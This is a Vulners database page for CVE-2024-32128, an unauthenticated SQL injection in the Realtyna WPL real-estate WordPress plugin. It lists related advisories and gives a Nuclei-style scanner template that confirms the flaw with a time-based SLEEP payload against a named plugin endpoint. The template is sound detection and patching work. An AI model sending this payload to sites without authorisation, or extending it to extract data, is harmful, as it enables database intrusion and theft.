| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2024-32128 | 12 Feb 202621:03 | – | circl | |
| WordPress Plugin Realtyna Organic IDX SQL注入漏洞 | 15 Apr 202400:00 | – | cnnvd | |
| CVE-2024-32128 | 15 Apr 202407:35 | – | cve | |
| CVE-2024-32128 WordPress Realtyna Organic IDX plugin + WPL Real Estate plugin <= 4.14.4 - Unauthenticated SQL Injection vulnerability | 15 Apr 202407:35 | – | cvelist | |
| EUVD-2024-29949 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-32128 | 15 Apr 202408:15 | – | nvd | |
| WordPress Realtyna Organic IDX plugin Plugin <= 4.14.4 is vulnerable to SQL Injection | 12 Apr 202400:00 | – | patchstack | |
| WordPress Realtyna Organic IDX plugin + WPL Real Estate plugin <= 4.14.4 - Unauthenticated SQL Injection vulnerability | 12 Apr 202409:38 | – | patchstack | |
| PT-2024-24422 | 15 Apr 202400:00 | – | ptsecurity | |
| CVE-2024-32128 | 5 Feb 202506:53 | – | redhatcve |
id: CVE-2024-32128
info:
name: WordPress Realtyna Organic IDX Plugin <= 4.14.4 - SQL Injection
author: Shivam Kamboj
severity: critical
description: |
The Realtyna Organic IDX plugin plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 4.14.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
impact: |
Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or database compromise.
remediation: |
Update to the latest version of the plugin, version 4.14.5 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-32128
- https://patchstack.com/database/wordpress/plugin/real-estate-listing-realtyna-wpl/vulnerabilities
metadata:
verified: true
max-request: 2
publicwww-query: "/plugins/real-estate-listing-realtyna-wpl"
tags: cve,cve2024,wordpress,wp-plugin,sqli,realtyna,wp,real-estate-listing-realtyna-wpl
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /?wpl_format=f:property_listing:ajax&wpl_function=get_total_results&sf_tmin_price=1 HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
redirects: true
matchers:
- type: dsl
dsl:
- 'contains(body_1, "real-estate-listing-realtyna-wpl")'
- 'contains_any(body_2, "\"success\":1", "\"total\":")'
- 'status_code_2 == 200'
condition: and
internal: true
- raw:
- |
@timeout: 30s
GET /?wpl_format=f:property_listing:ajax&wpl_function=get_total_results&sf_tmin_price=1%20AND%20(SELECT%201%20FROM%20(SELECT%20SLEEP(8))x) HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
matchers:
- type: dsl
dsl:
- 'duration>=8'
- 'status_code == 200'
- 'contains_any(body, "\"success\":1", "\"total\":")'
condition: and
# digest: 4a0a00473045022100f37341fbf0910c696672ad6e2b4c62222eb344650201a7ab38aca4954d531476022076e68451d355cfba130d16876fe70617a293e2e8c5cd0f348e1f08dfcd9b0d55:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation